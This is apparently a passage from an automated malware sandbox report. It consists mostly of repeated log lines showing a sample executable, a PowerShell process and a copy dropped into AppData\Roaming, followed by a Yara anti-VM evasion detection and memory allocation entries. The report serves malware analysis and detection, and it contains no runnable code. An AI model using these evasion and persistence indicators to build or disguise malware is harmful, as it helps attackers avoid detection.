Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PvAmrCZENy.exe PID: 7112, type: MEMORYSTR

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 2FF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 31F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 3120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Memory allocated: 8B90000 memory reserve \| memory write watch	Jump to behavior
